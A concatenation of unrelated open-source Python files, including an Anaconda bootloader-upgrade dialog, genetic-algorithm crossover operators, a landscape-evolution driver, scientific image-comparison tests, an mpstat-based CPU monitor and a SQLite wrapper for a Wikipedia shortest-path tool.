icomfort/anaconda | iw/upgrade_bootloader_gui.py | 1 | 7815 | #
# upgrade_bootloader_gui.py: gui bootloader dialog for upgrades
#
# Copyright (C) 2002, 2007 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Jeremy Katz <[email protected]>
#
# must replace with explcit form so update disks will work
from iw_gui import *
import gtk
from booty import checkbootloader
from storage.devices import devicePathToName
from constants import *
import gettext
_ = lambda x: gettext.ldgettext("anaconda", x)
import logging
log = logging.getLogger("anaconda")
class UpgradeBootloaderWindow (InstallWindow):
windowTitle = N_("Upgrade Boot Loader Configuration")
def getPrev(self):
pass
def getNext(self):
if self.nobl_radio.get_active():
self.dispatch.skipStep("bootloadersetup", skip = 1)
self.dispatch.skipStep("bootloader", skip = 1)
self.dispatch.skipStep("bootloaderadvanced", skip = 1)
self.dispatch.skipStep("instbootloader", skip = 1)
elif self.newbl_radio.get_active():
self.dispatch.skipStep("bootloadersetup", skip = 0)
self.dispatch.skipStep("bootloader", skip = 0)
self.dispatch.skipStep("bootloaderadvanced", skip = 0)
self.dispatch.skipStep("instbootloader", skip = 0)
self.bl.doUpgradeOnly = 0
else:
self.dispatch.skipStep("bootloadersetup", skip = 0)
self.dispatch.skipStep("bootloader", skip = 1)
self.dispatch.skipStep("bootloaderadvanced", skip = 1)
self.dispatch.skipStep("instbootloader", skip = 0)
self.bl.doUpgradeOnly = 1
if self.type == "GRUB":
self.bl.useGrubVal = 1
else:
self.bl.useGrubVal = 0
self.bl.setDevice(devicePathToName(self.bootDev))
def _newToLibata(self, rootPath):
# NOTE: any changes here need to be done in upgrade_bootloader_text too
try:
f = open("/proc/modules", "r")
buf = f.read()
if buf.find("libata") == -1:
return False
except:
log.debug("error reading /proc/modules")
pass
try:
f = open(rootPath + "/etc/modprobe.conf")
except:
log.debug("error reading /etc/modprobe.conf")
return False
modlines = f.readlines()
f.close()
try:
f = open("/tmp/scsidisks")
except:
log.debug("error reading /tmp/scsidisks")
return False
mods = []
for l in f.readlines():
(disk, mod) = l.split()
if mod.strip() not in mods:
mods.append(mod.strip())
f.close()
for l in modlines:
stripped = l.strip()
if stripped == "" or stripped[0] == "#":
continue
if stripped.find("scsi_hostadapter") != -1:
mod = stripped.split()[-1]
if mod in mods:
mods.remove(mod)
if len(mods) > 0:
return True
return False
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
newToLibata = self._newToLibata(anaconda.rootPath)
(self.type, self.bootDev) = \
checkbootloader.getBootloaderTypeAndBoot(anaconda.rootPath, storage=anaconda.id.storage)
self.update_radio = gtk.RadioButton(None, _("_Update boot loader configuration"))
updatestr = _("This will update your current boot loader.")
if newToLibata or (self.type is None or self.bootDev is None):
if newToLibata:
current = _("Due to system changes, your boot loader "
"configuration can not be automatically updated.")
else:
current = _("The installer is unable to detect the boot loader "
"currently in use on your system.")
self.update_label = gtk.Label("%s" % (updatestr,))
self.update_radio.set_sensitive(False)
self.update_label.set_sensitive(False)
update = 0
else:
current = _("The installer has detected the %(type)s boot loader "
"currently installed on %(bootDev)s.") \
% {'type': self.type, 'bootDev': self.bootDev}
self.update_label = gtk.Label("%s %s" % (updatestr,
_("This is the recommended option.")))
self.update_radio.set_active(False)
update = 1
self.newbl_radio = gtk.RadioButton(self.update_radio,
_("_Create new boot loader "
"configuration"))
self.newbl_label = gtk.Label(_("This option creates a "
"new boot loader configuration. If "
"you wish to switch boot loaders, you "
"should choose this."))
self.newbl_radio.set_active(False)
self.nobl_radio = gtk.RadioButton(self.update_radio,
_("_Skip boot loader updating"))
self.nobl_label = gtk.Label(_("This option makes no changes to boot "
"loader configuration. If you are "
"using a third party boot loader, you "
"should choose this."))
self.nobl_radio.set_active(False)
for label in [self.update_label, self.nobl_label, self.newbl_label]:
label.set_alignment(0.8, 0)
label.set_size_request(275, -1)
label.set_line_wrap(True)
str = _("What would you like to do?")
# if they have one, the default is to update, otherwise the
# default is to not touch anything
if update == 1:
default = self.update_radio
elif newToLibata:
default = self.newbl_radio
else:
default = self.nobl_radio
if not self.dispatch.stepInSkipList("bootloader"):
self.newbl_radio.set_active(True)
elif self.dispatch.stepInSkipList("instbootloader"):
self.nobl_radio.set_active(True)
else:
default.set_active(True)
box = gtk.VBox(False, 5)
label = gtk.Label(current)
label.set_line_wrap(True)
label.set_alignment(0.5, 0.0)
label.set_size_request(300, -1)
label2 = gtk.Label(str)
label2.set_line_wrap(True)
label2.set_alignment(0.5, 0.0)
label2.set_size_request(300, -1)
box.pack_start(label, False)
box.pack_start(label2, False, padding = 10)
box.pack_start(self.update_radio, False)
box.pack_start(self.update_label, False)
box.pack_start(self.nobl_radio, False)
box.pack_start(self.nobl_label, False)
box.pack_start(self.newbl_radio, False)
box.pack_start(self.newbl_label, False)
a = gtk.Alignment(0.2, 0.1)
a.add(box)
return a
| gpl-2.0 | -1,104,869,317,210,438,500 | 36.392344 | 108 | 0.565963 | false |
longyangking/Husky | Husky/GA/MultiUtils/Crossover.py | 1 | 8881 | # Author: Yang Long <[email protected]>
#
# License: LGPL-2.1
import numpy as np
def Laplacian(parents,rank,distance,LB,UB,IntCon,args):
'''
Laplacian Crossover Operator (Two parents, Two childs: Son & Girl)
'''
a = 0
breal = 0.5
bint = 0.75
if args.has_key('a'):
a = args['a']
if args.has_key('breal'):
breal = args['breal']
if args.has_key('bint'):
bint = args['bint']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
r = np.random.random(N)
u = np.random.random(N)
beta = a + breal*np.log(u)*(r>0.5) - breal*np.log(u)*(r<=0.5)
if IntCon is not None:
beta[IntCon] = a + bint*np.log(u[IntCon])*(r[IntCon]>0.5) - bint*np.log(u[IntCon])*(r[IntCon]<=0.5)
father = parents[fatherindex]
mother = parents[motherindex]
son = father + beta*np.abs(father - mother)
girl = mother + beta*np.abs(father - mother)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def Scattered(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on the random binary control vector
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
p = np.random.randint(2,size=N)
father = parents[fatherindex]
mother = parents[motherindex]
son = father*(p==1) + mother*(p==0)
girl = father*(p==0) + mother*(p==1)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def SinglePoint(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on a random point
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
pos = np.random.randint(1,N)
father = parents[fatherindex]
mother = parents[motherindex]
son = np.concatenate((father[:pos], mother[pos:]))
girl = np.concatenate((mother[:pos], father[pos:]))
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def TwoPoint(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on two random points (Default)
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
if N > 1:
start = np.random.randint(N-1)
end = np.random.randint(start,N)
else:
start = N
end = N
father = parents[fatherindex]
mother = parents[motherindex]
son = np.concatenate((mother[:start], father[start:end], mother[end:]))
girl = np.concatenate((father[:start], mother[start:end], father[end:]))
childs[index] = son
if index+1 < M: # Odd number of parents
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def Intermediate(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on the intermediate evolution
'''
ratio = 1.0
if args.has_key('ratio'):
ratio = args['ratio']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
father = parents[fatherindex]
mother = parents[motherindex]
son = father + ratio*np.random.random(size=N)*(mother - father)
girl = mother + ratio*np.random.random(size=N)*(father - mother)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def Heuristic(parents,rank,distance,LB,UB,IntCon,args):
'''
Evolve with the direction to better parent
'''
R = 1.2
if args.has_key('R'):
R = args['R']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
father = parents[fatherindex]
fatherfitness = fitness[fatherfitness]
mother = parents[motherindex]
motherfitness = fitness[motherfitness]
son = father + (fatherfitness>motherfitness)*R*(father - mother) + (fatherfitness<=motherfitness)*R*(mother - father)
girl = mother + (fatherfitness>motherfitness)*R*(father - mother) + (fatherfitness<=motherfitness)*R*(mother - father)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def LogisticChaoticSequence(parents,rank,distance,LB,UB,IntCon,args):
# TODO This part will be done after the completement of module Optimize
return TwoPoint(parents,rank,distance,LB,UB,IntCon)
def Arithmetic(parents,rank,distance,LB,UB,IntCon,args):
# TODO This part will be done after the completement of module Optimize
return TwoPoint(parents,rank,distance,LB,UB,IntCon)
| lgpl-2.1 | 6,432,612,505,830,202,000 | 28.118033 | 126 | 0.56041 | false |
decvalts/landlab | landlab/components/gflex/examples/gflex_coupled_driver.py | 1 | 2398 | # -*- coding: utf-8 -*-
"""
A driver for our version of AW's gFlex component.
Created on Fri Feb 20 11:17:52 2015
@author: danhobley
"""
from __future__ import print_function
from landlab.components.gFlex.flexure import gFlex
from landlab.components.flow_routing.route_flow_dn import FlowRouter
from landlab.components.stream_power.fastscape_stream_power import SPEroder as Fsc
from landlab.components.stream_power.stream_power import StreamPowerEroder
import numpy as np
import pylab
from landlab import RasterModelGrid
from landlab import ModelParameterDictionary
from landlab.plot.imshow import imshow_node_grid
inputs = ModelParameterDictionary('./coupled_SP_gflex_params.txt')
nrows = inputs.read_int('nrows')
ncols = inputs.read_int('ncols')
dx = inputs.read_float('dx')
dt = inputs.read_float('dt')
time_to_run = inputs.read_float('run_time')
init_elev = inputs.read_float('init_elev')
uplift_perstep = inputs.read_float('uplift_rate')*dt
rock_stress_param = inputs.read_float('rock_density')*9.81
mg = RasterModelGrid(nrows, ncols, dx)
#create the fields in the grid
mg.create_node_array_zeros('topographic__elevation')
z = mg.create_node_array_zeros() + init_elev
mg['node'][ 'topographic__elevation'] = z + np.random.rand(len(z))/1000.
#make some surface load stresses in a field to test
mg.at_node['surface_load__stress'] = np.zeros(nrows*ncols, dtype=float)
#instantiate:
gf = gFlex(mg, './coupled_SP_gflex_params.txt')
fsp = Fsc(mg, './coupled_SP_gflex_params.txt')
sp = StreamPowerEroder(mg, './coupled_SP_gflex_params.txt')
fr = FlowRouter(mg)
#perform the loop:
elapsed_time = 0. #total time in simulation
while elapsed_time < time_to_run:
print(elapsed_time)
if elapsed_time+dt>time_to_run:
print("Short step!")
dt = time_to_run - elapsed_time
mg = fr.route_flow()
#mg = fsp.erode(mg)
mg,_,_ = sp.erode(mg, dt, node_drainage_areas='drainage_area', slopes_at_nodes='topographic__steepest_slope')
mg.at_node['surface_load__stress'] = (mg.at_node['topographic__elevation']+1000)*rock_stress_param
gf.flex_lithosphere()
mg.at_node['topographic__elevation'][mg.number_of_nodes//4:3.*mg.number_of_nodes//4] += uplift_perstep
elapsed_time += dt
pylab.figure(1)
im = imshow_node_grid(mg, 'topographic__elevation') # display a colored image
pylab.figure(2)
im = imshow_node_grid(mg, 'lithosphere__vertical_displacement')
| mit | 8,369,907,553,255,900,000 | 35.333333 | 113 | 0.725605 | false |
veltri/DLV2 | tests/parser/bug.02.test.py | 1 | 1041 | input = """
colored(2,g) :- not diff_col(2,g).
colored(2,y) :- not diff_col(2,y).
colored(3,g) :- not diff_col(3,g).
colored(3,y) :- not diff_col(3,y).
diff_col(2,g) :- colored(2,y).
diff_col(3,g) :- colored(3,y).
diff_col(2,y) :- colored(2,g).
diff_col(3,y) :- colored(3,g).
no_stable :- colored(2,2), colored(3,2), not no_stable.
no_stable :- colored(2,3), colored(3,3), not no_stable.
no_stable :- colored(2,g), colored(3,g), not no_stable.
no_stable :- colored(2,y), colored(3,y), not no_stable.
"""
output = """
colored(2,g) :- not diff_col(2,g).
colored(2,y) :- not diff_col(2,y).
colored(3,g) :- not diff_col(3,g).
colored(3,y) :- not diff_col(3,y).
diff_col(2,g) :- colored(2,y).
diff_col(3,g) :- colored(3,y).
diff_col(2,y) :- colored(2,g).
diff_col(3,y) :- colored(3,g).
no_stable :- colored(2,2), colored(3,2), not no_stable.
no_stable :- colored(2,3), colored(3,3), not no_stable.
no_stable :- colored(2,g), colored(3,g), not no_stable.
no_stable :- colored(2,y), colored(3,y), not no_stable.
"""
| apache-2.0 | -6,610,001,634,986,753,000 | 30.65625 | 55 | 0.594621 | false |
marrow/monitor.collector | marrow/monitor/collector/ext/cpu.py | 1 | 4403 | # encoding: utf-8
import os
import subprocess
import mongoengine as db
try:
from itertools import izip as zip
except ImportError: # pragma: no cover
pass
class CPUDetail(db.EmbeddedDocument):
user = db.FloatField(db_field='u', verbose_name="Userspace Percentage")
nice = db.FloatField(db_field='n', verbose_name="Low-Priority Percentage")
system = db.FloatField(db_field='s', verbose_name="System Percentage")
iowait = db.FloatField(db_field='io', verbose_name="IO-Blocked Percentage")
irq = db.FloatField(db_field='hi', verbose_name="IRQ Percentage")
soft = db.FloatField(db_field='si', verbose_name="Soft IRQ Percentage")
steal = db.FloatField(db_field='vs', verbose_name="Sibling VM Percentage")
guest = db.FloatField(db_field='vg', verbose_name="Child VM Percentage")
idle = db.FloatField(db_field='i', verbose_name="Idle Percentage")
_fmap = dict(user='%usr', nice='%nice', system='%sys',
iowait='%iowait', irq='%irq', soft='%soft',
steal='%steal', guest='%guest', idle='%idle')
_ifmap = dict(zip(_fmap.values(), _fmap))
def __repr__(self):
fmap = self._fmap
parts = []
for attr in fmap:
value = getattr(self, attr, None)
if value is None: continue
parts.append("%1.2f %s" % (value, fmap[attr]))
return "<CPUDetail %s>" % ', '.join(parts)
class CPUMixIn(object):
# This list will be len(n+1) where n is the number of cores.
# The first value represents the aggregate across all cores.
cpu = db.ListField(db.EmbeddedDocumentField(db.EmbeddedDocument), verbose_name="Processor Information", default=list)
def mpstat_backend():
"""Parse the output of the mpstat program.
Testing on a Linux 2.6.35 Rackspace Cloud server: 1s
"""
# Linux 2.6.35.4-rscloud (tabris.lesite.ca) 01/03/2012 _x86_64_ (4 CPU)
#
# 09:19:08 PM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
# 09:19:09 PM all 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# 09:19:09 PM 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
#
# Average: CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
# Average: all 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# Average: 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00
# TODO: Offload IO to the coroutine reactor.
_ifmap = CPUDetail._ifmap
mappings = []
result = subprocess.check_output(['mpstat', '-P', 'ALL', '1', '1'])
for line in result.split('\n'):
if not line.startswith('Average:'):
continue
parts = line.replace(' ', ' ').replace(' ', ' ').split()[2:]
if not mappings:
mappings = [_ifmap.get(i) for i in parts]
continue
detail = dict()
for attr, part in zip(mappings, parts):
if not attr: continue
detail[attr] = float(part) / 100.0
yield CPUDetail(**detail)
_map = {'mpstat': mpstat_backend, None: mpstat_backend}
class CPUExtension(object):
def __init__(self, config):
super(CPUExtension, self).__init__()
# TODO: Standard trifecta.
self.backend = _map[config.get('backend')]
@property
def mixin(self):
return LoadMixIn
def start(self):
pass
def stop(self):
pass
def __call__(self, rec):
rec.cpu = list()
for chunk in self.backend():
if not isinstance(chunk, db.EmbeddedDocument):
yield chunk
rec.cpu.append(chunk)
| mit | 5,991,399,908,975,429,000 | 34.796748 | 121 | 0.537361 | false |
DayGitH/Python-Challenges | DailyProgrammer/DP20150825C.py | 1 | 3159 | """
[08-21-2015] Challenge #228 [Hard] Golomb Rulers
https://www.reddit.com/r/dailyprogrammer/comments/3hsgr0/08212015_challenge_228_hard_golomb_rulers/
# Description
A typical ruler has many evenly spaced markings. For instance a standard 12” ruler has 13 marks along its edge, each
spaced 1” apart. This is great, and allows the measurement all (integer) values of length between 1” and 12”.
However, a standard ruler is grossly inefficient. For example, the distance of length 1” can be measured multiple ways
on this ruler: 0 to 1, 1 to 2, 2 to 3, etc.
A mathematician named Solomon W. Golomb had an idea about making rulers more efficient, and rulers of this type are
named after him. A Golomb ruler comprises a series of marks such that no two pairs of marks are the same distance
apart. Below is an example. This ruler has markings that allow all integer distances between 1-6 units to be measured.
Not only that, but each distance can be measured in only way way.
0 1 4 6
+-+-----+----+
You can see how you can measure every integer distance between 1 and 6:
0 1 4 6
+-+-----+----+
1 +-+
2 +----+
3 +-----+
4 +-------+
5 +----------+
6 +------------+
Golomb rulers are described by their **order**, which is the number of marks on their edge. The example above is an
order 4 ruler. The length of a Golomb ruler is the distance between the outer two marks and, obviously, represents the
longest distance it can measure. The above example has a length of 6.
There is no requirement that a Golomb ruler measures all distances up to their length – the only requirement is that
each distance is only measured in one way. However, if a ruler does measure all distances, it is classified as a
*perfect* Golomb ruler. The above example is a perfect Golumb ruler. Finally, a Golomb ruler is described as *optimal*
if no shorter ruler of the same order exists.
Today's challenge is to determine where to place the marks on an optimal (but not necessarily perfect) Golomb ruler
when given its order.
# Input Description
You'll be given a single integer on a line representing the optimal Golomb ruler order. Examples:
3
5
# Output Description
Your program should emit the length of the optimal Golomb ruler and the placement of the marks. Note that some have
multiple solutions, so any or all of the solutions can be yielded. Examples:
3 3 0 1 3
5 11 0 1 4 9 11
0 2 7 8 11
Here you can see that we have two solutions for a Golomb ruler of order five and length 11.
# Challenge Input
8
7
10
20
26
# Challenge Output
Beware the word wrap!
8 34 0 1 4 9 15 22 32 34
7 25 0 1 4 10 18 23 25
0 1 7 11 20 23 25
0 1 11 16 19 23 25
0 2 3 10 16 21 25
0 2 7 13 21 22 25
10 55 0 1 6 10 23 26 34 41 53 55
20 283 0 1 8 11 68 77 94 116 121 156 158 179 194 208 212 228 240 253 259 283
26 492 0 1 33 83 104 110 124 163 185 200 203 249 251 258 314 318 343 356 386 430 440 456 464 475 487 492
"""
def main():
pass
if __name__ == "__main__":
main()
| mit | -260,046,427,798,202,430 | 43.323944 | 118 | 0.686368 | false |
mardom/GalSim | devel/external/test_sersic_highn/test_comparison_basic.py | 1 | 4149 | import sys
import logging
import galsim
"""A simple Python test script to demonstrate use of the galsim.utilities.compare_dft_vs_photon_*
functions.
This script generates a model galaxy and PSF, and then compares the rendering of this object by both
photon shooting and DFT methods, by calling the GSObject `drawShoot()` and `draw()` methods
respectively.
There are two functions that do this in galsim.utilities:
i) galsim.utilities.compare_dft_vs_photon_object
ii) galsim.utilities.compare_dft_vs_photon_config
i) allows the object and optional convolving PSF to be specified directly as GSObject instances.
However, as these are not picklable, these tests can only run in single core mode.
ii) provides multi-core processing functionality, but requires that the object and optional
convolving PSF are specified via a `config` dictionary (see, e.g., examples/demo8.py).
The two methods don't provide identical results, because the `object` version uses only one random
generator sequence to generate all the photons, whereas the `config` version uses a number of
differently seeded random number generators, one for each image. One purpose of this script was
a quick sanity check of their overall consistency, as well as being a demonstration of these testing
utility functions.
"""
# Make the galaxy and PSF objects elliptical Sersic and Moffat, storing all param vals here
# in top level scope
galn = 3.3
galhlr = 0.9
psfbeta = 3.40
psffwhm = 0.85
g1gal = -0.23
g2gal = -0.17
g1psf = +0.03
g2psf = +0.01
# Set a pixel scale (e.g. in arcsec), and image size
dx = 0.27
imsize = 48
# Random seed
rseed = 111333555
# Value of wmult parameter
wmult = 4.
# Value of test tolerance parameters
tol_ellip = 3.e-5
tol_size = 1.e-4
n_photons_test= (int(1e6), int(3.e6), int(1.e7))
def test_comparison_object(np):
logging.basicConfig(level=logging.WARNING, stream=sys.stdout)
logger = logging.getLogger("test_comparison_object")
logger.info("Running basic tests of comparison scripts using objects")
# Build a trial galaxy
gal = galsim.Sersic(galn, half_light_radius=galhlr)
gal.applyShear(g1=g1gal, g2=g2gal)
# And an example PSF
psf = galsim.Moffat(beta=psfbeta, fwhm=psffwhm)
psf.applyShear(g1=g1psf, g2=g2psf)
# Try a single core run
print "Starting tests using config file with N_PHOTONS = "+str(np)
res1 = galsim.utilities.compare_dft_vs_photon_object(
gal, psf_object=psf, rng=galsim.BaseDeviate(rseed), size=imsize, pixel_scale=dx,
abs_tol_ellip=tol_ellip, abs_tol_size=tol_size, n_photons_per_trial=np)
print res1
return
def test_comparison_config(np):
logging.basicConfig(level=logging.WARNING, stream=sys.stdout)
logger = logging.getLogger("test_comparison_config")
logger.info("Running basic tests of comparison scripts using config")
# Set up a config dict to replicate the GSObject spec above
config = {}
config['gal'] = {
"type" : "Sersic",
"n" : galn,
"half_light_radius" : galhlr,
"ellip" : {
"type" : "G1G2",
"g1" : g1gal,
"g2" : g2gal
}
}
config['psf'] = {
"type" : "Moffat",
"beta" : psfbeta,
"fwhm" : psffwhm,
"ellip" : {
"type" : "G1G2",
"g1" : g1psf,
"g2" : g2psf
}
}
config['image'] = {
'size' : imsize,
'pixel_scale' : dx,
'random_seed' : rseed,
'wmult' : wmult
}
# Use an automatically-determined N core run setting
print "Starting tests using config file with N_PHOTONS = "+str(np)
res8 = galsim.utilities.compare_dft_vs_photon_config(
config, n_photons_per_trial=np, nproc=-1, logger=logger, abs_tol_ellip=tol_ellip,
abs_tol_size=tol_size)
print res8
return
if __name__ == "__main__":
for n_photons in n_photons_test:
# First run the config version, then the (slower, single core) object version: see docstring
# in module header for more info.
test_comparison_config(n_photons)
test_comparison_object(n_photons)
| gpl-3.0 | 5,994,837,120,358,078,000 | 29.284672 | 100 | 0.673415 | false |
narusemotoki/awikie | awikie/settings.py | 1 | 1182 | # -*- coding: utf-8 -*-
# awikie -- This is Wiki engine working in Google App Engine.
# Copyright (C) <2013> Motoki Naruse <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
)
INSTALLED_APPS = (
'awikie'
)
ROOT_URLCONF = 'awikie.urls'
import os
ROOT_PATH = os.path.dirname(__file__)
TEMPLATE_DIRS = (
ROOT_PATH + '/templates',
)
CACHE_BACKEND = 'memcached:///'
import sys
sys.path.append(ROOT_PATH + '/lib')
AUTHORIZED_USER = (
)
| agpl-3.0 | -7,708,945,888,221,004,000 | 26.488372 | 77 | 0.696277 | false |
jwngr/sdow | sdow/database.py | 1 | 9203 | """
Wrapper for reading from and writing to the SDOW database.
"""
import os.path
import sqlite3
import helpers as helpers
from breadth_first_search import breadth_first_search
class Database(object):
"""Wrapper for connecting to the SDOW database."""
def __init__(self, sdow_database, searches_database):
if not os.path.isfile(sdow_database):
raise IOError('Specified SQLite file "{0}" does not exist.'.format(sdow_database))
if not os.path.isfile(searches_database):
raise IOError('Specified SQLite file "{0}" does not exist.'.format(searches_database))
self.sdow_conn = sqlite3.connect(sdow_database, check_same_thread=False)
self.searches_conn = sqlite3.connect(searches_database, check_same_thread=False)
self.sdow_cursor = self.sdow_conn.cursor()
self.searches_cursor = self.searches_conn.cursor()
self.sdow_cursor.arraysize = 1000
self.searches_cursor.arraysize = 1000
def fetch_page(self, page_title):
"""Returns the ID and title of the non-redirect page corresponding to the provided title,
handling titles with incorrect capitalization as well as redirects.
Args:
page_title: The title of the page to fetch.
Returns:
(int, str, bool): A tuple containing the page ID, title, and whether or not a redirect was
followed.
OR
None: If no page exists.
Raises:
ValueError: If the provided page title is invalid.
"""
sanitized_page_title = helpers.get_sanitized_page_title(page_title)
query = 'SELECT * FROM pages WHERE title = ? COLLATE NOCASE;'
query_bindings = (sanitized_page_title,)
self.sdow_cursor.execute(query, query_bindings)
# Because the above query is case-insensitive (due to the COLLATE NOCASE), multiple articles
# can be matched.
results = self.sdow_cursor.fetchall()
if not results:
raise ValueError(
'Invalid page title {0} provided. Page title does not exist.'.format(page_title))
# First, look for a non-redirect page which has exact match with the page title.
for current_page_id, current_page_title, current_page_is_redirect in results:
if current_page_title == sanitized_page_title and not current_page_is_redirect:
return (current_page_id, helpers.get_readable_page_title(current_page_title), False)
# Next, look for a match with a non-redirect page.
for current_page_id, current_page_title, current_page_is_redirect in results:
if not current_page_is_redirect:
return (current_page_id, helpers.get_readable_page_title(current_page_title), False)
# If all the results are redirects, use the page to which the first result redirects.
query = 'SELECT target_id, title FROM redirects INNER JOIN pages ON pages.id = target_id WHERE source_id = ?;'
query_bindings = (results[0][0],)
self.sdow_cursor.execute(query, query_bindings)
result = self.sdow_cursor.fetchone()
# TODO: This will no longer be required once the April 2018 database dump occurs since this
# scenario is prevented by the prune_pages_file.py Python script during the database creation.
if not result:
raise ValueError(
'Invalid page title {0} provided. Page title does not exist.'.format(page_title))
return (result[0], helpers.get_readable_page_title(result[1]), True)
def fetch_page_title(self, page_id):
"""Returns the page title corresponding to the provided page ID.
Args:
page_id: The page ID whose ID to fetch.
Returns:
str: The page title corresponding to the provided page ID.
Raises:
ValueError: If the provided page ID is invalid or does not exist.
"""
helpers.validate_page_id(page_id)
query = 'SELECT title FROM pages WHERE id = ?;'
query_bindings = (page_id,)
self.sdow_cursor.execute(query, query_bindings)
page_title = self.sdow_cursor.fetchone()
if not page_title:
raise ValueError(
'Invalid page ID "{0}" provided. Page ID does not exist.'.format(page_id))
return page_title[0].encode('utf-8').replace('_', ' ')
def compute_shortest_paths(self, source_page_id, target_page_id):
"""Returns a list of page IDs indicating the shortest path between the source and target pages.
Note: the provided page IDs must correspond to non-redirect pages, but that check is not made
for performance reasons.
Args:
source_page_id: The ID corresponding to the page at which to start the search.
target_page_id: The ID corresponding to the page at which to end the search.
Returns:
list(list(int)): A list of integer lists corresponding to the page IDs indicating the shortest path
between the source and target page IDs.
Raises:
ValueError: If either of the provided page IDs are invalid.
"""
helpers.validate_page_id(source_page_id)
